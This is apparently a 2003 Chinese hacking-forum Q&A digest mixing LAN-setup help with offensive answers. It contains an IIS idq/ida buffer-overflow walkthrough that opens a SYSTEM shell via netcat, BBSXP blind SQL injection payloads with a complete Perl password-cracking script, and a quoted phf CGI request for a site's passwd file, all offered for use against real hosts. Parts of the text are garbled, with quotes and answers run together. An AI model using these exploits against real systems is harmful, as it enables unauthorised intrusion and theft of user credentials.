|
冰血封情 该用户已被删除
|
[原创]冰血封情精彩问答录第二期
[这个贴子最后由冰血封情在 2003/06/28 03:26pm 第 1 次编辑]
注意:本文所讲的问题是专门为暗域个人会员提供的问题回答……如果转载请注明出处!这里是暗域特色服务,会员问题回答!中国暗域网络的技术交流宗旨是尽力为您排忧解难,给您营造一个健康向上的技术交流环境,打造一流的前瞻性技术资讯站点!
[答疑]局域网完全设置客户端解决方案!
主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1662
问题来源:[/quote]
正文回答:
首先在安装了好了所有网络驱动程序之后,右键选择网络邻居。
在‘属性’中选择‘添加’-‘协议’,然后添加‘NetBEUI’和IPX/IPS兼容协议。然后在添加服务:‘微软网络上的文件与打印机共享’!
然后TCP/IP的属性中填写已经分配好的IP地址,和DNS,GATEWAY,子网掩码……
然后回头设置计算机名和工作组……
这样设置好了重新启动后~您常识PING GATEWAY的IP地址……
看看通不通?如果不通就检查自己的网卡和其他的网络连接有没有问题~
如果您已经确认这些都OK!那么就是主机的问题……
现在用软件扫描一下GATEWAY的IP,看看是否开了出网的PROXY?
如果开了……尝试在IE里设置GATEWAY为代理,端口填写PROXY服务的端口!
这样一般就可以连接INTERNET了~如果还不行那就是主机的问题……
询问是否设置了过滤:)
否则我们也无计可施了~~~~~
[答疑]通过null.idq/null.ida漏洞掘取ADMIN权限
主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1652
问题来源:
http://forum.hackway.net/showthread.php?s=&threadid=1651
正文回答:
您提供的那台主机太恐怖了,全都是洞,随便用个一个能取得权限的流行漏洞来给你讲讲吧:)
本问一处需要使用的工具有:idqhack/idahack、NC连接工具……
都在这里下:http://tee.96188.com/download/
以下我们假设已经把下载的溢出程序放在了C:\下
那么开始~
c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck
现在轻松溢出成功,现在你可以telnet它的80端口,这里冰血封情用NC来连接。
C:\nc -vv 127.0.0.1 80
Microsoft Windows 2000 [Version 5.00.2195]
(C)版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
现在我们已经成功入侵得到了SYSTEM权限,下面就是加用户和做你想做的了:)
[答疑]漫谈无标识的共享的实现以及修改硬盘图标
主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1636
问题来源:最初由 ********** 发表
[B]在共享时图标会出现一个“手”,我如何才能做到共享后图标还是原来的模样呢??还有一个问题,就是如何改变C盘的图标 [/B] [I]最初由[B]******[/B]发表[/I]
冰血封情GG这个怎么用啊?
最初由 ******** 发表
[B]近来在研究“BBSXP多个文件存在Sql Injection漏洞我在研究过程中发现,出现了一个小问题。因为我们学校的论坛正好是BBSXP这类型的。我在上面注册了一用户。得到了版主的权限。例如:我的用户为:ABC,这个用户是?.. [/B] if instr(username," ")>0 then:error("非法操作"):end if
if Request.Cookies("username")="" then
error("您还还未登陆社区") login.asp
...
if instr(username," ")>0 then:error("非法操作"):end if//空格!!??
sql="select * from user where username='"&username&"'"
rs.Open sql,Conn
if rs.eof then
message=message&"此用户名还未注册"
error(""&message&"")
end if
if userpass<>rs("userpass") then
message=message&"您输入的密码错误" usercp.asp:
-------------包含文件setup.asp中的关键代码
sql="select * from user where username='"&Request.Cookies("username")&"'"
if Request.Cookies("userpass")<>us("userpass") then
Response.Cookies("username")=""
Response.Cookies("userpass")="" '如果密码不对cookie清空
end if
userface=""&us("userface")&"" '败笔,保存了一个值,可作返回值判断
-------------setup.asp中的关键代码结束
用户头像 |
src="images/face/<%=userface%>.gif"> '用这个信息作为判断如果我们提交如下请求:
$request= "GET /asp/bbsxp/bbsxp/usercp.asp HTTP/1.0\r\n".
"Host: $host\r\n".
"Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=i\n\n";
返回的<%=userface%>不为空的话,则证明root密码为6位,其余一切和上面例子一样!
还想要例子吗?比如说:
register.asp:
http://www.target.com/asp/bbsxp/bbsxp/register.asp?menu=Check&username=root'and(len(userpass)=6)and'1
可判断条件成功返回字符串:已经有用户使用,请另外选择一个用户名
profile.asp:
http://www.target.com/asp/bbsxp/bbsxp/profile.asp?username=root'and(len(userpass)=6)and'1
可判断条件成功返回字符串:用户类型
shop.asp:
$request= "GET /asp/bbsxp/bbsxp/shop.asp HTTP/1.0\r\n".
"Host: $host\r\n".
"Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=iamod\n\n";
可判断条件成功返回字符串:密码错误
recycle.asp:
$request= "GET /asp/bbsxp/bbsxp/recycle.asp HTTP/1.0\r\n".
"Host: $host\r\n".
"Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=iamod\n\n";
可判断条件成功返回字符串:本论坛共有
由于篇幅所限,就不一一列举了;此外还有RecoverPasswd.aspv、prison.asp、play.asp、friend.asp、faction.asp、bank.asp...大量文件存在相同问题,真是令人汗颜!
如下是一个通过register.asp文件来破解用户口令的小程序(很快的哦),当然,稍作修改便可用于其他存在相同缺陷的文件或场合:
#!/usr/bin/perl
#Codz By PsKey2003/3/29
#This Script can crack BBSXP user's password
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwu');
print "==========================================\n";
print "Codz By PsKey2003/3/29\n";
print "==========================================\n";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_u));
$host=$opt_h;
$port=$opt_p||80;
$way=$opt_w;
$user=$opt_u;
print "\nPlease wait...\n\n";
@dic=(0..100);
for ($i=0;$i<@dic;$i++)
{
$username=$user."'and(len(userpass)='$dic[$i]')and'1";
$request = "GET $way?menu=Check&username=$username HTTP/1.0\r\n".
"Host: $host\r\n".
"Cookie: eremite=0;\n\n";
print "$dic[$i].";
@in = sendraw($request);
@num=grep /已经有用户使用/, @in;
$size=@num;
if ($size > 0) {
print "\n\nSuccessful,The length of the password is $dic[$i] .\n\n";
$lenpwd=$dic[$i];
last;
}
}
for ($j=1;$j<=$lenpwd;$j++)
{
@dic11=(0..9);
@dic12=(a..z);
@special=qw(` ~ ! @ # $ %25 ^ %26 * \( \) _ %2b = - { } [ ] : " ; < > ? | , . / \\);
@special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? | , 。 / 、 〈 〉 ');
@dic=(@dic11,@dic12,@special,@special2);
for ($i=0;$i<@dic;$i++)
{
$key=$pws.$dic[$i];
$username=$user."'and(left(userpass,$j)='$key')and'1";
$request = "GET $way?menu=Check&username=$username HTTP/1.0\r\n".
"host:$host\r\n".
"Cookie: eremite=0;\n\n";
print "$dic[$i].";
@in = sendraw($request);
@num=grep /已经有用户使用/, @in;
@num1=grep /操作符丢失/, @in;
$size=@num;
$size1=@num1;
if ($size > 0) {
$th=$j.th;
print "\nSuccessful,The $th word of the password is $dic[$i] \n";
$pws=$pws.$dic[$i];
last;
}
elsif ($size1 > 0)
{
$th=$j.th;
print "\nSuccessful,The $th word of the password is $dic[$i] \n\n";
print " ☆☆☆☆Attention☆☆☆☆ \n";
print "Something wrong,i can't go on,so you should crack it yourself!Poor...\n";
exit 0;
}
}
}
$pws=~s/\%2b/\+/ig;
$pws=~s/\%25/\%/ig;
$pws=~s/\%26/\&/ig;
print "\n\nSuccessful,the full password of $user is $pws.\n";
sub usage {
print qq~
Usage: $0 -h [-p ] -w -u
-h =hostname you want to crack
-p =port,80 default
-w =the path of the weak file
-u =the user you want to crack
Eg: $0 -h www.target.com -p 80 -w /bbsxp/register.asp -u root
~;
exit;
}
#thanx rfp's sendraw
sub sendraw {
my ($request) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket
problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $request;
my @in = ;
select(STDOUT);
close(S);
return @in;
}
else {
die("Can't connect...\n");
}
}
以上转载,我觉得此类问题,对KEN似乎有些太高了……
[答疑]3389端口开放配合输入法漏洞攻击法
主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1424最初由 ****** 发表
[B]3389的端口怎么攻击? [/B] 最初由 ******* 发表
[B]我把你推荐的书买回来看了。有关监听的那本才开始看里边有关主机IP、子网掩码关系的有点不是很明白你能解释一下吗?THANK YOU VERY MUCH! [/B] 最初由 ******** 发表
[B]请问我已找到开139的机子使用nbtstat -a ip命令后显示
本地连接
node ipaddress:[xxx.xxx.x.xxx]scope id []
host not found.
请问这是什么意思?我该怎么做才可利用139成功入侵?我使用XP操作系统?..[/B] Node IpAddress: [xxx.xxx.x.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
REFDOM <00> UNIQUE Registered
REFDOM <03> UNIQUE Registered
REFDOM <20> UNIQUE Registered
REFDOM$ <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~REFDOM.......<00> UNIQUE Registered
……
MAC Address = XX-XX-XX-XX-XX-XX
如果对方有文件(或者打印)共享,那么就会显示类似上面的信息。如果出现的是 ‘Host Not Found’,那么就可能没有提供共享或者安装了防火墙之类的软件阻隔了,具体情况冰血封情也很难猜测了:)。
感谢您在暗域提出问题,希望冰血封情的解答对你有帮助:)
[答疑]IE中右件网际快车下载失效解决方法
主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1568
本文是我的朋友*******所问!希望对他有所帮助!
[QUOTE]我前天装了一个网际快车,但不知怎么搞的,当我单击右键时出现了网际快车下载,但我点击时,却没有反应呀!以前都能用呀!!你能帮帮我吗? 最初由 ******** 发表
[B]要怎么样才能设置呢?我在控制面板里设置了可只要开机时点击取消就可以进入。有什么别的办法吗?? [/B] 最初由 ******* 发表
[B]那位GG能告诉我几种利用浏览器来进行攻击的方法
就想这样的。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用
http://thegnome.com/cgi-bin/phf?Qal.../passwd指令可以
拿到那个站点的passwd.但还有些更好的执行方法呦如:[/B]
|
